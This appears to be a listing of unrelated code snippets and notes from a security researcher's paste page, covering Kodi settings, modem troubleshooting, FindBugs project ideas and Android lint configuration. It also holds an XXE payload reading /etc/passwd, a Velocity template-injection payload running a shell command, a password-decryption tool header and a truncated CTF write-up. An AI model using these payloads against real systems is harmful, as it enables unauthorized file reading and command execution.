h3xstream

<advancedsettings>
<!-- http://kodi.wiki/view/Advancedsettings.xml --> 
  
  <!-- Display information overlay for the complete duration of the play in visualisation mode -->
  <songinfoduration>999999999999999</songinfoduration>
  
<advancedsettings>

h3xstream

Troubleshooting Thomson DCM475

If one LED is flashing at the time

Refer to the official help: https://help.teksavvy.com/hc/en-us/articles/200314560-Light-Patterns-Thomson-DCM475

If all the LED are flashing rapidely

This means that your power supply unit (PSU) is defective.

h3xstream

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<feed>
    <title>test</title>
    <description>test</description>

    
    

h3xstream

#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##

#set($ex=$rt.getRuntime().exec('ls'))##
$ex.waitFor()
#set($out=$ex.getInputStream())##
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end

h3xstream

YMCA Pool schedules

http://www.ymcaquebec.org/Blog/Pool-Maintenance-Closures

• http://www.ymcaquebec.org/Find-a-Y/Downtown-YMCA
• http://www.ymcaquebec.org/Find-a-Y/Cartierville-YMCA
• http://www.ymcaquebec.org/Find-a-Y/Du-Parc-YMCA

h3xstream

Idées de Projet de fin d'étude

FindBugs

• FindBugs: http://findbugs.sourceforge.net/
• Find Security Bugs : http://find-sec-bugs.github.io/
• Tutoriel : https://github.com/find-sec-bugs/find-sec-bugs/wiki/Writing-a-detector
• Tutoriel : http://www.ibm.com/developerworks/library/j-findbug2/
• Source d'inspiration: https://github.com/mebigfatguy/fb-contrib

h3xstream

> javac *.java
> javap -c StringBuilderProcessor

Compiled from "StringBuilderProcessor.java"
public class StringBuilderProcessor implements GenericProcessor<java.lang.StringBuilder> {
  public StringBuilderProcessor();
    Code:
       0: aload_0
       1: invokespecial #1                  // Method java/lang/Object."<init>":()V
       4: return

h3xstream

<?xml version="1.0" encoding="UTF-8"?>
<inspections version="1.0" is_locked="false">
  <option name="myName" value="Android Lint - Security only checks" />
  <option name="myLocal" value="false" />
  <inspection_tool class="AccessStaticViaInstance" enabled="false" level="WARNING" enabled_by_default="false" />
  <inspection_tool class="AndroidDomInspection" enabled="false" level="ERROR" enabled_by_default="false" />
  <inspection_tool class="AndroidElementNotAllowed" enabled="false" level="WARNING" enabled_by_default="false" />
  <inspection_tool class="AndroidLintAaptCrash" enabled="false" level="ERROR" enabled_by_default="false" />
  <inspection_tool class="AndroidLintAccidentalOctal" enabled="false" level="ERROR" enabled_by_default="false" />
  <inspection_tool class="AndroidLintAdapterViewChildren" enabled="false" level="WARNING" enabled_by_default="false" />

h3xstream

/*
 * (C) 2012 MSRoth - msroth.wordpress.com
 * 
 * recoverPW v2
 * 
 * This code will decrypt BOF and database passwords.  It will *NOT* decrypt 
 * inline user passwords.
 * 
 * From the D6.5 EMC Documentum Content Server Administration Guide, p. 353:
 * "Passwords encrypted with encryptPassword cannot be decrypted explicitly 

h3xstream

Starting at the URL http://web200.gosec.net:7721, we can see a login page for a dating site.

Small oracle

It is possible to identify that the user admin exists because we get two distinct error messages.

Invalid user: